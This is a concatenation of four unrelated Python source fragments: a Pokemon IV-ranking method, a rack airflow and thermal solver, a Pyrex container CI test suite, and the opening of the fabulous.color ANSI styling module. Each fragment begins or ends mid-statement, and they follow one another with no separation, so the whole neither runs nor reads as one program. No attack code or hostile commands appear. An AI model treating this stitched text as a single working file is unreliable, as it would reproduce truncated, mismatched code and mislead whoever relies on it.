max_cp=2500) >>> Pokemon('swampert').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (1, 2, 15), >>> (12, 15, 14), >>> (14, 15, 14), >>> (14, 14, 14), >>> (14, 13, 15), >>> (15, 15, 10), >>> ] >>> Pokemon('sceptile').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('sceptile').leage_rankings_for(have_ivs, max_cp=2500) >>> have_ivs = [ >>> (0, 10, 15), >>> (1, 14, 11), >>> (11, 14, 13), >>> (12, 12, 13), >>> (14, 13, 13), >>> (2, 13, 12), >>> (2, 13, 15), >>> (2, 14, 14), >>> (2, 15, 14), >>> (3, 12, 11), >>> (3, 4, 15), >>> (3, 13, 14), >>> (3, 5, 2), >>> (4, 10, 13), >>> (4, 12, 15), # shadow >>> (5, 15, 12), >>> (7, 13, 15), >>> (7, 15, 8), >>> (15, 13, 15), >>> ] >>> Pokemon('gyarados').leage_rankings_for(have_ivs, max_cp=np.inf) >>> Pokemon('gyarados').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('gyarados').leage_rankings_for(have_ivs, max_cp=1500) >>> have_ivs = [ >>> (14, 14, 15), >>> (10, 14, 15), >>> (15, 15, 15), >>> (15, 15, 15), >>> ] >>> Pokemon('rhyperior').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (14, 14, 14), >>> (12, 13, 14), >>> (13, 14, 14), >>> (15, 13, 14), >>> (8, 6, 8), >>> ] >>> Pokemon('vigoroth').leage_rankings_for(have_ivs, max_cp=1500) >>> have_ivs = [ >>> (6, 15, 13), >>> (3, 4, 14), >>> (2, 9, 15), >>> (6, 14, 15), >>> (7, 15, 15), >>> (10, 15, 15), >>> ] >>> Pokemon('shiftry').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('shiftry').leage_rankings_for(have_ivs, max_cp=2500) >>> have_ivs = [ >>> (15, 15, 14), >>> (0, 7, 8), >>> (3, 12, 14), >>> (5, 5, 15), >>> (4, 7, 12), >>> (15, 14, 14), >>> (10, 14, 15), >>> ] >>> Pokemon('alakazam').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('alakazam').leage_rankings_for(have_ivs, max_cp=2500) >>> have_ivs = [ >>> (0, 15, 6), >>> (11, 10, 10), >>> (12, 12, 11), >>> (15, 10, 12), >>> ] >>> Pokemon('salamence').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('salamence').leage_rankings_for(have_ivs, max_cp=2500) >>> 
Pokemon('salamence').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (6, 10, 10), >>> (11, 9, 14), >>> (13, 12, 14), >>> (15, 15, 15), >>> (15, 15, 5), >>> ] >>> Pokemon('flygon').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('flygon').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('flygon').leage_rankings_for(have_ivs, max_cp=np.inf) >>> have_ivs = [ >>> (6, 11, 11), >>> (10, 11, 10), >>> (10, 11, 12), >>> (6, 14, 4), >>> (15, 12, 15), >>> (15, 7, 15), >>> ] >>> Pokemon('mamoswine').leage_rankings_for(have_ivs, max_cp=1500) >>> Pokemon('mamoswine').leage_rankings_for(have_ivs, max_cp=2500) >>> Pokemon('mamoswine').leage_rankings_for(have_ivs, max_cp=np.inf) """ rows = [] import itertools as it import numpy as np for iva, ivd, ivs in it.product(range(16), range(16), range(16)): attack = self.info['base_attack'] + iva defense = self.info['base_defense'] + ivd stamina = self.info['base_stamina'] + ivs best_level = None best_cp = None best_adjusted = None for level in list(np.arange(1, max_level + 0.5, 0.5)): cand_cp, adjusted = calc_cp(attack, defense, stamina, level) if cand_cp <= max_cp: best_cp = cand_cp best_level = level best_adjusted = adjusted else: break row = { 'iva': iva, 'ivd': ivd, 'ivs': ivs, 'cp': best_cp, 'level': best_level, 'attack': best_adjusted['attack'], 'defense': best_adjusted['defense'], 'stamina': best_adjusted['stamina'], } rows.append(row) import kwarray df = kwarray.DataFrameArray.from_dict(rows) df = df.pandas() df['stat_product'] = (df['attack'] * df['defense'] * df['stamina']) / 1000 df = df.sort_values('stat_product', ascending=False) df['rank'] = np.arange(1, len(df) + 1) df = df.set_index('rank', drop=False) min_ = df['stat_product'].min() max_ = df['stat_product'].max() df['percent'] = ((df['stat_product'] - min_) / (max_ - min_)) * 100 return df def calc_cp(self): if self.level is None: best_cp
# -*- coding: utf-8 -*- """ Created on Tue Jun 25 08:19:27 2019 @author: SESA539950 """ from scipy.optimize import fsolve import numpy as np simulation = ["AC Unit", "Ventilation Fans (Economizer Mode)"] simulation_options = ["AC Fans on UPS", "Vent Fans on UPS"] simulation01 = [ "AC Unit", "Front Ventilation Fan (Economizer Mode)", "Rear Ventilation Fan (Economizer Mode)", "Both Ventilation Fans (Economizer Mode)", ] simulation_options01 = [ "AC Fans (on UPS)", "Front Ventilation Fan (on UPS)", "Rear Ventilation Fan (on UPS)", "Front Ventilation Fan (on UPS)", "Rear Ventilation Fan (on UPS)", "Both Ventilation Fans (on UPS)", ] w = 2 # Door width [ft] rho = 1.19 # Density of air [kg/m^3] Cp = 1005.0 # Specific heat capacity of air [J/kg-K] a_AC = 117137.3 # Flow resistance of AC fan [Pa/(m^3/s)^2] e_IT = 0.8 # Effectiveness of heat exchanger in IT servers + UPS # C_AC = 26*650 # Thermal mass of AC [J/K] # e_AC = 0.8 # Effectiveness of heat exchanger in AC Q = np.zeros(10) P = np.zeros(4) dt = 1 class FNMsolver: def __init__( self, ss_condition, AC_option, VF_option, size_rack, n_IT, q_IT, n_BP, T_AC, T_amb, size_UPS, q_UPS, t_max, size_AC, Q_AC_max, Q_VF_max, P_AC_stag, P_VF_stag, a_FL, a_RL, ): self.ss_condition = ss_condition # Steady-state Simulation condition self.tr_condition = ss_condition # Transient Simulation condition self.AC_option = AC_option # AC Fans on UPS self.VF_option = VF_option # Vent Fans on UPS self.size_rack = size_rack # Rack size in U self.h = self.size_rack * 6.5 / 42 # Door height [ft] self.n_IT = n_IT # Total IT population in rack (U) self.C_IT = n_IT * 11.3 * 650 # Thermal mass of IT servers + UPS [J/K] self.q_IT = q_IT * 1000 # Total IT power (kW to W converted) self.Q_IT = 0.125 * self.q_IT * 0.0004719474 # Total IT airflow rate [m^3/s] self.n_BP = n_BP # Number of blanking panels self.T_AC = (T_AC - 32) * 5 / 9 + 273.15 # AC set point temperature [K] self.T_amb = (T_amb - 32) * 5 / 9 + 273.15 # Ambient Temperature [K] self.size_UPS 
= size_UPS # Size of UPS (U) self.C_UPS = self.size_UPS * 11.3 * 650 # Thermal mass of UPS [J/K] self.C_IT = self.C_IT + self.C_UPS # Thermal mass of IT servers + UPS [J/K] self.q_UPS = ( q_UPS * 1000 * 0.1 ) # Heat generated by UPS (10% of rated power) (kW to W converted) self.t_max = 60 * t_max # Total simulation time (s) self.size_AC = size_AC # Size of cooling unit (U) self.C_AC = self.size_AC * 26 * 650 # Thermal mass of AC self.q_AC = q_IT * 1000 # Cooling capacity of AC (W) self.Q_AC_max = ( Q_AC_max * 0.0004719474 ) # Open flow rate (cfm to m^3/s converted) self.Q_VF_max = Q_VF_max * 0.0004719474 self.P_AC_stag = ( P_AC_stag * 248.84 ) # Stagnation pressure (inH2O to Pa converted) self.P_VF_stag = P_VF_stag * 248.84 self.a_FL = 10 ** a_FL self.a_RL = 10 ** a_RL # Nomenclature of resistances, airflow rates and pressure terms # Q_IT = Q[0] # Q_AC = Q[1] # Q_SP = Q[2] # Q_L = Q[3] # Q_VF_f = Q[4] # Q_VF_r = Q[5] ## Q_FD = Q[6] ## Q_FP = Q[7] ## Q_RD = Q[8] ## Q_RP = Q[9] # # P_1 = P[0] # P_2 = P[1] ## P_1_f = P[2] ## P_2_r = P[3] # # a_AC = {a_AC: .2f} # a_SP = {a_SP: .2f} ## a_FD = {a_FD: .2f} ## a_FP = {a_FP: .2f} # a_FL = {a_FL: .2f} ## a_RD = {a_RD: .2f} ## a_RP = {a_RP: .2f} # a_RL = {a_RL: .2f} def flowRes(self): if ( self.size_rack - self.n_IT - self.n_BP - self.size_UPS - self.size_AC ) == 0.0: a_SP = ( 1530.5 * (6.5 / self.h) ** 2 ) # Server plane resistance measured from St. 
Louis data elif ( self.size_rack - self.n_IT - self.n_BP - self.size_UPS - self.size_AC ) > 0.0: b_SP = ( self.size_rack - self.n_IT - self.size_UPS - self.size_AC - self.n_BP ) / (self.size_rack - self.n_IT - self.size_UPS - self.size_AC) f_SP = (1 / b_SP ** 2) * ( 1 + (0.5 * (1 - b_SP) ** 0.75) + (1.414 * (1 - b_SP) ** 0.375) ) a_SP = ( f_SP * rho / ( 2 * ( 0.905 * (self.size_rack - self.n_IT - self.size_UPS - self.size_AC) / self.size_rack ) ** 2 ) ) # Rear area of rack (size of 42 U) = 0.905 m^2 # if self.ss_condition == simulation01[1] or self.VF_option == [simulation_options01[1]] or self.VF_option == [simulation_options01[3]]: # a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # a_RL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # # elif self.ss_condition == simulation01[2] or self.VF_option == [simulation_options01[2]] or self.VF_option == [simulation_options01[4]]: # a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # a_RL = 0.01 * self.a_RL * 1530.5 * (6.5 / self.h) ** 2 # # elif self.ss_condition == simulation01[3] or self.VF_option == [simulation_options01[1], simulation_options01[2]] or self.VF_option == [simulation_options01[2], simulation_options01[1]] or self.VF_option == [simulation_options01[5]]: # a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 # a_RL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 if self.ss_condition == simulation01[0] and not self.VF_option: a_FL = self.a_FL * 1530.5 * (6.5 / self.h) ** 2 a_RL = self.a_FL * 1530.5 * (6.5 / self.h) ** 2 else: a_FL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 a_RL = 0.01 * self.a_FL * 1530.5 * (6.5 / self.h) ** 2 a = [a_SP, a_FL, a_RL] return a # AC Unit ON, Both VF OFF def case_1(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[1] - self.Q_AC_max * (1 - (P[0] - P[1]) / self.P_AC_stag) f[2] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[3] = Q[3] - np.sign(-P[0]) * np.sqrt(np.abs(P[0]) / a[1]) 
f[4] = Q[3] - np.sign(P[1]) * np.sqrt(np.abs(P[1]) / a[2]) f[5] = Q[3] + Q[1] - Q[0] - Q[2] f[6] = Q[4] f[7] = Q[5] return f # Both VF ON, AC Unit OFF def case_2(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[4] - self.Q_VF_max * (1 - (P[0] / self.P_VF_stag)) f[2] = Q[5] - self.Q_VF_max * (1 - (-P[1]) / self.P_VF_stag) f[3] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[4] = Q[1] - np.sign(P[1] - P[0]) * np.sqrt(np.abs(P[1] - P[0]) / a_AC) f[5] = Q[3] - Q[2] + Q[1] - Q[0] f[6] = Q[3] - Q[4] - np.sign(-P[0]) * np.sqrt(np.abs(P[0]) / a[1]) f[7] = Q[3] - Q[5] - np.sign(P[1]) * np.sqrt(np.abs(P[1]) / a[2]) return f # Front VF ON, AC Unit OFF def case_2a(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[4] - self.Q_VF_max * (1 - (P[0] / self.P_VF_stag)) f[2] = Q[5] f[3] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[4] = Q[1] - np.sign(P[1] - P[0]) * np.sqrt(np.abs(P[1] - P[0]) / a_AC) f[5] = Q[3] - Q[2] + Q[1] - Q[0] f[6] = Q[3] - Q[4] - np.sign(-P[0]) * np.sqrt(np.abs(P[0]) / a[1]) f[7] = Q[3] - np.sign(P[1]) * np.sqrt(np.abs(P[1]) / a[2]) return f # Rear VF ON, AC Unit OFF def case_2b(self, z): Q = z[0:6] P = z[6:8] f = np.zeros(8) a = self.flowRes() f[0] = Q[0] - self.Q_IT f[1] = Q[4] f[2] = Q[5] - self.Q_VF_max * (1 - (-P[1]) / self.P_VF_stag) f[3] = Q[2] - np.sign(P[0] - P[1]) * np.sqrt(np.abs(P[0] - P[1]) / a[0]) f[4] = Q[1] - np.sign(P[1] - P[0]) * np.sqrt(np.abs(P[1] - P[0]) / a_AC) f[5] = Q[3] - Q[2] + Q[1] - Q[0] f[6] = Q[3] - np.sign(-P[0]) * np.sqrt(np.abs(P[0])
<filename>ci/test.py #! /usr/bin/env python3 # # Copyright 2019-2020 Garmin Ltd. or its subsidiaries # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import configparser import grp import os import pty import pwd import re import resource import shutil import subprocess import sys import tempfile import threading import unittest PYREX_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) sys.path.append(PYREX_ROOT) import pyrex # NOQA TEST_PREBUILT_TAG_ENV_VAR = "TEST_PREBUILT_TAG" def skipIfPrebuilt(func): def wrapper(self, *args, **kwargs): if os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, ""): self.skipTest("Test does not apply to prebuilt images") return func(self, *args, **kwargs) return wrapper def skipIfOS(os, version): def decorator(func): def wrapper(self, *args, **kwargs): (image_os, image_version, _) = self.test_image.split("-") if image_os == os and image_version == version: self.skipTest("Test does not apply to %s-%s" % (os, version)) return func(self, *args, **kwargs) return wrapper return decorator built_images = set() class PyrexTest(object): @property def pokyroot(self): return os.path.join(PYREX_ROOT, "poky", self.pokyver) def setUp(self): self.build_dir = os.path.join(PYREX_ROOT, "build", "%d" % os.getpid()) def cleanup_build(): if os.path.isdir(self.build_dir): shutil.rmtree(self.build_dir) self.addCleanup(cleanup_build) cleanup_build() os.makedirs(self.build_dir) self.pyrex_conf = os.path.join(self.build_dir, "pyrex.ini") conf = self.get_config() 
conf.write_conf() if not os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, ""): self.prebuild_image() def cleanup_env(): os.environ.clear() os.environ.update(self.old_environ) # OE requires that "python" be python2, not python3 self.bin_dir = os.path.join(self.build_dir, "bin") self.old_environ = os.environ.copy() os.makedirs(self.bin_dir) os.symlink("/usr/bin/python2", os.path.join(self.bin_dir, "python")) os.environ["PATH"] = self.bin_dir + ":" + os.environ["PATH"] os.environ["PYREX_BUILD_QUIET"] = "0" os.environ["PYREX_OEINIT"] = os.path.join(self.pokyroot, "oe-init-build-env") os.environ["PYREX_CONFIG_BIND"] = PYREX_ROOT for var in ("SSH_AUTH_SOCK", "BB_ENV_PASSTHROUGH_ADDITIONS"): if var in os.environ: del os.environ[var] self.thread_dir = os.path.join( self.build_dir, "%d.%d" % (os.getpid(), threading.get_ident()) ) os.makedirs(self.thread_dir) def prebuild_image(self): global built_images image = ":".join((self.test_image, self.provider)) if image not in built_images: self.assertSubprocess( [ os.path.join(PYREX_ROOT, "ci", "build_image.py"), "--provider", self.provider, self.test_image, ] ) built_images.add(image) def get_config(self, *, defaults=False): class Config(configparser.RawConfigParser): def write_conf(self): write_config_helper(self) def write_config_helper(conf): with open(self.pyrex_conf, "w") as f: conf.write(f) config = Config() if os.path.exists(self.pyrex_conf) and not defaults: config.read(self.pyrex_conf) else: config.read_string(pyrex.read_default_config(True)) # Setup the config suitable for testing config["config"]["image"] = self.test_image config["config"]["engine"] = self.provider config["config"]["buildlocal"] = "0" tag = os.environ.get(TEST_PREBUILT_TAG_ENV_VAR, "") if tag: config["config"]["pyrextag"] = tag else: config["config"]["pyrextag"] = "ci-test" config["config"]["registry"] = "" config["run"]["bind"] += " " + self.build_dir config["imagebuild"]["buildcommand"] = "%s --provider=%s %s" % ( os.path.join(PYREX_ROOT, "ci", 
"build_image.py"), self.provider, self.test_image, ) return config def assertSubprocess( self, *args, pretty_command=None, capture=False, returncode=0, **kwargs ): if capture: try: output = subprocess.check_output( *args, stderr=subprocess.STDOUT, **kwargs ) except subprocess.CalledProcessError as e: ret = e.returncode output = e.output else: ret = 0 self.assertEqual( ret, returncode, msg="%s: %s" % (pretty_command or " ".join(*args), output.decode("utf-8")), ) return output.decode("utf-8").rstrip() else: with subprocess.Popen( *args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs ) as proc: while True: out = proc.stdout.readline().decode("utf-8") if not out and proc.poll() is not None: break if out: sys.stdout.write(out) ret = proc.poll() self.assertEqual( ret, returncode, msg="%s failed" % (pretty_command or " ".join(*args)) ) return None def _write_host_command( self, args, *, quiet_init=False, cwd=PYREX_ROOT, builddir=None, bitbakedir="", init_env={} ): if builddir is None: builddir = self.build_dir command = ['export %s="%s"\n' % (k, v) for k, v in init_env.items()] command.extend( [ "PYREXCONFFILE=%s\n" % self.pyrex_conf, ". 
%s/pyrex-init-build-env%s %s %s && " % ( self.pokyroot, " > /dev/null 2>&1" if quiet_init else "", builddir, bitbakedir, ), "(", " && ".join(list(args)), ")", ] ) command = "".join(command) cmd_file = os.path.join(self.thread_dir, "command") with open(cmd_file, "w") as f: f.write(command) return cmd_file, command def _write_container_command(self, args): cmd_file = os.path.join(self.thread_dir, "container_command") with open(cmd_file, "w") as f: f.write(" && ".join(args)) return cmd_file def assertPyrexHostCommand( self, *args, quiet_init=False, cwd=PYREX_ROOT, builddir=None, bitbakedir="", init_env={}, **kwargs ): cmd_file, command = self._write_host_command( args, quiet_init=quiet_init, cwd=cwd, builddir=builddir, bitbakedir=bitbakedir, init_env=init_env, ) return self.assertSubprocess( [os.environ.get("SHELL", "/bin/bash"), cmd_file], pretty_command=command, cwd=cwd, **kwargs ) def assertPyrexContainerShellCommand(self, *args, **kwargs): cmd_file = self._write_container_command(args) return self.assertPyrexHostCommand("pyrex-shell %s" % cmd_file, **kwargs) def assertPyrexContainerCommand(self, cmd, **kwargs): return self.assertPyrexHostCommand("pyrex-run %s" % cmd, **kwargs) def assertPyrexContainerShellPTY( self, *args, returncode=0, env=None, quiet_init=False, bitbakedir="" ): container_cmd_file = self._write_container_command(args) host_cmd_file, _ = self._write_host_command( ["pyrex-shell %s" % container_cmd_file], quiet_init=quiet_init, bitbakedir=bitbakedir, ) stdout = [] def master_read(fd): while True: data = os.read(fd, 1024) if not data: return data stdout.append(data) old_env = None try: if env: old_env = os.environ.copy() os.environ.clear() os.environ.update(env) status = pty.spawn(["/bin/bash", host_cmd_file], master_read) finally: if old_env is not None: os.environ.clear() os.environ.update(old_env) self.assertFalse( os.WIFSIGNALED(status), msg="%s died from a signal: %s" % (" ".join(args), os.WTERMSIG(status)), ) self.assertTrue( 
os.WIFEXITED(status), msg="%s exited abnormally" % " ".join(args) ) self.assertEqual( os.WEXITSTATUS(status), returncode, msg="%s failed" % " ".join(args) ) return (b"".join(stdout)).decode("utf-8").rstrip() class PyrexImageType_base(PyrexTest): """ Base image tests. All images that derive from a -base image should derive from this class """ def test_init(self): self.assertPyrexHostCommand("true") def test_pyrex_shell(self): self.assertPyrexContainerShellCommand("exit 3", returncode=3) def test_pyrex_run(self): self.assertPyrexContainerCommand("/bin/false", returncode=1) def test_in_container(self): def capture_pyrex_state(*args, **kwargs): capture_file = os.path.join(self.thread_dir, "pyrex_capture") if self.provider == "podman": self.assertPyrexContainerShellCommand( "cp --no-preserve=all /proc/1/cmdline %s" % capture_file, *args, **kwargs ) with open(capture_file, "rb") as f: return f.read() else: self.assertPyrexContainerShellCommand( "cat /proc/self/cgroup > %s" % capture_file, *args, **kwargs ) with open(capture_file, "r") as f: return f.read() def capture_local_state(): if self.provider == "podman": with open("/proc/1/cmdline", "rb") as f: return f.read() else: with open("/proc/self/cgroup", "r") as f: return f.read() local_state = capture_local_state() pyrex_state = capture_pyrex_state() self.assertNotEqual(local_state, pyrex_state) def test_quiet_build(self): env = os.environ.copy() env["PYREX_BUILD_QUIET"] = "1" self.assertPyrexHostCommand("true", env=env) def test_bad_provider(self): # Prevent container build from working os.symlink("/bin/false", os.path.join(self.bin_dir, self.provider)) # Verify that attempting to run build pyrex without a valid container # provider shows the installation instructions output = self.assertPyrexHostCommand("true", returncode=1, capture=True) self.assertIn("Unable to run", output) def test_ownership(self): # Test that files created in the container are the same UID/GID as the # user running outside test_file = 
os.path.join(self.thread_dir, "ownertest") if os.path.exists(test_file): os.unlink(test_file) self.assertPyrexContainerShellCommand( 'echo "$(id -un):$(id -gn)" > %s' % test_file ) s = os.stat(test_file) self.assertEqual(s.st_uid, os.getuid()) self.assertEqual(s.st_gid, os.getgid()) with open(test_file, "r") as f: (username, groupname) = f.read().rstrip().split(":") self.assertEqual(username, pwd.getpwuid(os.getuid()).pw_name) self.assertEqual(groupname, grp.getgrgid(os.getgid()).gr_name) def test_owner_env(self): # This test is primarily designed to ensure that everything is passed # correctly through 'pyrex run' if self.provider == "podman": self.skipTest("Rootless podman cannot change to another user") conf = self.get_config() # Note: These config variables are intended for testing use only conf["run"]["uid"] = "1337" conf["run"]["username"] = "theuser" conf["run"]["groups"] = "7331:thegroup 7332:othergroup" conf["run"]["initcommand"] = "" conf.write_conf() # Make a fifo that the container can write into. 
We can't just write a # file because it won't be owned by running user and thus can't be # cleaned up old_umask = os.umask(0) self.addCleanup(os.umask, old_umask) fifo = os.path.join(self.thread_dir, "fifo") os.mkfifo(fifo) self.addCleanup(os.remove, fifo) os.umask(old_umask) output = [] def read_fifo(): nonlocal output with open(fifo, "r") as f: output = f.readline().rstrip().split(":") thread = threading.Thread(target=read_fifo) thread.start() try: self.assertPyrexContainerShellCommand( 'echo "$(id -u):$(id -g):$(id -un):$(id -gn):$USER:$GROUP:$(id -G):$(id -Gn)" > %s' % fifo ) finally: thread.join() self.assertEqual(output[0], "1337") self.assertEqual(output[1], "7331") self.assertEqual(output[2], "theuser") self.assertEqual(output[3], "thegroup") self.assertEqual(output[4], "theuser") self.assertEqual(output[5], "thegroup") self.assertEqual(output[6], "7331 7332") self.assertEqual(output[7], "thegroup othergroup") def test_rlimit_nofile(self): if self.provider != "podman": self.skipTest("Only podman needs rlimit changes") (soft, hard) = resource.getrlimit(resource.RLIMIT_NOFILE) try: resource.setrlimit(resource.RLIMIT_NOFILE, (hard / 2, hard)) s = self.assertPyrexContainerShellCommand( "ulimit -n && ulimit -Hn", capture=True, quiet_init=True ) self.assertEqual(tuple(int(lim) for lim in s.split()), (hard, hard)) finally: resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard)) def test_bind_from_PYREX_BIND(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) temp_file = os.path.join(temp_dir, "data") env = os.environ.copy() env["PYREX_BIND"] = temp_dir self.assertPyrexContainerShellCommand("echo 123 > %s" % temp_file, env=env) with open(temp_file, "r") as f: self.assertEqual(f.read(), "123\n") def test_duplicate_binds(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) conf = self.get_config() conf["run"]["bind"] += " %s %s" % (temp_dir, temp_dir) conf.write_conf() 
self.assertPyrexContainerShellCommand("true") def test_missing_bind(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) missing_bind = os.path.join(temp_dir, "does-not-exist") conf = self.get_config() conf["run"]["bind"] += " %s" % missing_bind conf.write_conf() s = self.assertPyrexContainerShellCommand( "test -e %s" % missing_bind, capture=True, returncode=1 ) self.assertRegex(s, r"Error: bind source path \S+ does not exist") def test_optional_bind(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) missing_bind = os.path.join(temp_dir, "does-not-exist") conf = self.get_config() conf["run"]["bind"] += " %s,optional" % missing_bind conf.write_conf() self.assertPyrexContainerShellCommand("test ! -e %s" % missing_bind) def test_readonly_bind(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) temp_file = "%s/test.txt" % temp_dir with open(temp_file, "w") as f: f.write("foo\n") conf = self.get_config(defaults=True) conf["run"]["bind"] += " %s" % temp_dir conf.write_conf() self.assertPyrexContainerShellCommand("echo bar1 > %s" % temp_file) with open(temp_file, "r")
# -*- coding: utf-8 -*- # # Copyright 2016 The Fabulous Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ fabulous.color ~~~~~~~~~~~~~~ The color module provides an object-oriented abstraction for stylized text inside the terminal. This includes things like bold text, blinking text, 4-bit ANSI colors, 8-bit xterm256 colors, and 24-bit "truecolor" colors. """ import sys import functools from fabulous.compatibility import printy from fabulous import utils, xterm256, grapefruit try: unicode = unicode except NameError: unicode = str basestring = (str, bytes) OVERLINE = u'\u203e' def esc(*codes): """Produces an ANSI escape code string from a list of integers This is a low level function that is abstracted by the other functions and classes in this module. """ return "\x1b[%sm" % (";".join([str(c) for c in codes])) class ColorString(object): r"""Abstract base class for stylized string-like objects. 
Subclasses make it possible to compose stylized text:: >>> str(red("hello")) '\x1b[31mhello\x1b[39m' >>> str(bold(red("hello"))) '\x1b[1m\x1b[31mhello\x1b[39m\x1b[22m' >>> str(plain("hello ", bold("world"))) 'hello \x1b[1mworld\x1b[22m' These objects also provide string length without taking into consideration the ANSI escape codes:: >>> len(red("hello")) 5 >>> len(str(red("hello"))) 15 >>> len(bold(red("hello"))) 5 >>> len(bold("hello ", red("world"))) 11 If you have the wcwidth module installed, it will be used for computing lengths:: """ sep = "" fmt = "%s" def __init__(self, *items): self.items = items def __str__(self): return self.fmt % (self.sep.join([unicode(s) for s in self.items])) def __repr__(self): return repr(unicode(self)) if sys.version_info[0] > 2: def __len__(self): try: import wcwidth # We use: # * wcwidth.wcswidth(item) to find the length of strs # * len(str(item)) to find the length of a bytes object # * len(item) for everything else. return sum([ wcwidth.wcswidth(item) if isinstance(item, str) else len(str(item)) if isinstance(item, bytes) else len(item) for item in self.items ]) except ModuleNotFoundError: return sum([len(str(item)) if isinstance(item, bytes) else len(item) for item in self.items]) else: def __len__(self): return sum([len(item) for item in self.items]) def __add__(self, cs): if not isinstance(cs, (basestring, ColorString)): msg = "Concatenatation failed: %r + %r (Not a ColorString or str)" raise TypeError(msg % (type(cs), type(self))) return ColorString(self, cs) def __radd__(self, cs): if not isinstance(cs, (basestring, ColorString)): msg = "Concatenatation failed: %r + %r (Not a ColorString or str)" raise TypeError(msg % (type(self), type(cs))) return ColorString(cs, self) @property def as_utf8(self): """A more readable way to say ``unicode(color).encode('utf8')`` """ return unicode(self).encode('utf8') def join(self, iterable): """ This works just like `str.join()`, but for ColorStrings! 
For example: >>> from fabulous.color import * >>> l = [ ... fg256("green", "napster good"), ... fg256("red", "fire bad"), ... ] >>> print(plain(" ").join(l)) """ ret = None for x in iterable: if ret is None: ret = x else: ret += self ret += x return ret class ColorString256(ColorString): r"""Base class for 256-color stylized string-like objects. See the :class:`.fg256`, :class:`.bg256`, :class:`.highlight256`, and :class:`.complement256` classes for more information. """ def __init__(self, color, *items): (r, g, b) = parse_color(color) self.color = xterm256.rgb_to_xterm(r, g, b) self.items = items def __str__(self): return self.fmt % ( self.color, self.sep.join([unicode(s) for s in self.items])) class ColorStringTrue(ColorString): r"""Base class for 24-bit "truecolor" stylized string-like objects. See the :class:`.fgtrue`, :class:`.bgtrue`, :class:`.highlighttrue`, and :class:`.complementtrue` classes for more information. """ def __init__(self, color, *items): self.color = parse_color(color) self.items = items def __str__(self): return self.fmt % ( self.color[0], self.color[1], self.color[2], self.sep.join([unicode(s) for s in self.items])) class plain(ColorString): r"""Plain text wrapper This class is useful for concatenating plain strings with :class:`.ColorString` objects. For example:: from fabulous.color import plain >>> len(plain("hello ", bold("kitty"))) 11 """ pass class bold(ColorString): r"""Bold text wrapper This class creates a string-like object containing bold or bright text. It also brightens the foreground and background colors. This is supported by all terminals that support ANSI color codes. 
Example usage:: from fabulous.color import bold print bold('i am bold!') print plain('hello ', bold('world')) The ANSI escape codes are as follows:: >>> str(bold("hello")) '\x1b[1mhello\x1b[22m' """ fmt = esc(1) + "%s" + esc(22) class italic(ColorString): r"""Italic text wrapper This class creates a string-like object containing italic text, which is supported by almost no terminals. The ANSI escape codes are as follows:: >>> str(italic("hello")) '\x1b[3mhello\x1b[23m' """ fmt = esc(3) + "%s" + esc(23) class underline(ColorString): r"""Underline text wrapper This class creates a string-like object containing underline text. This is supported by SOME terminals, as documented in the terminal support section. Example usage:: from fabulous.color import underline print underline('i am underlined!') print plain('hello ', underline('world')) The ANSI escape codes are as follows:: >>> str(underline("hello")) '\x1b[4mhello\x1b[24m' """ fmt = esc(4) + "%s" + esc(24) class underline2(ColorString): r"""Alternative underline text wrapper See also: :class:`.underline`. The ANSI escape codes are as follows:: >>> str(underline2("hello")) '\x1b[21mhello\x1b[24m' """ fmt = esc(21) + "%s" + esc(24) class strike(ColorString): r"""Strike-through text wrapper This class creates a 